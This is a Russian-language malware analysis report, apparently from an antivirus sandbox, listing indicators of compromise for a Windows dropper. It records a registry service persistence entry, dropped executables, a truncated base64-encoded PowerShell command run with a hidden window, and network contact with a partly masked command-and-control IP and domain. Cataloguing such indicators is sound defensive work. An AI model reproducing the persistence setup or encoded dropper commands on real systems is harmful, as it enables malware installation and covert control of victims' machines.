Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\KBDTUQ] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\KBDTUQ] 'ImagePath' = '"%WINDIR%\SysWOW64\NlsData004c\KBDTUQ.exe"'
- 'KBDTUQ' "%WINDIR%\SysWOW64\NlsData004c\KBDTUQ.exe"
- 'KBDTUQ' %WINDIR%\SysWOW64\NlsData004c\KBDTUQ.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABRAGMAaQB6AHIAcQBxAD0AKAAnAFQAZQAnACsAJwA4AHUAagBtAGsAJwApADsALgAoACcAbgBlAHcAJwArACcALQBpAHQAZQAnACsAJwBtACcAKQAgACQAZQBOAHYAOgBUAEUAbQBwAFwAbwBGAGYAaQBjAGUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AH...
- %TEMP%\office2019\qklap6og.exe
- %WINDIR%\syswow64\nlsdata004c\kbdtuq.exe
- %TEMP%\office2019\qklap6og.exe в %WINDIR%\syswow64\nlsdata004c\kbdtuq.exe
- '18#.#0.61.163':443
- http://18#.##.61.163:443/T4R2J93LuC2dll8/t0y94pMANcbM3gJW/CNjM2iZaApvVjx/ygEiXbuI/xd65Mwb/lZzGCum3gQzxrv/ via 18#.#0.61.163
- DNS ASK tr#####rtyescrow.com
- '%TEMP%\office2019\qklap6og.exe'
- '%WINDIR%\syswow64\nlsdata004c\kbdtuq.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABRAGMAaQB6AHIAcQBxAD0AKAAnAFQAZQAnACsAJwA4AHUAagBtAGsAJwApADsALgAoACcAbgBlAHcAJwArACcALQBpAHQAZQAnACsAJwBtACcAKQAgACQAZQBOAHYAOgBUAEUAbQBwAFwAbwBGAGYAaQBjAGUAMgAwADEAOQAgAC0AaQB0AGUAbQB0AH...' (со скрытым окном)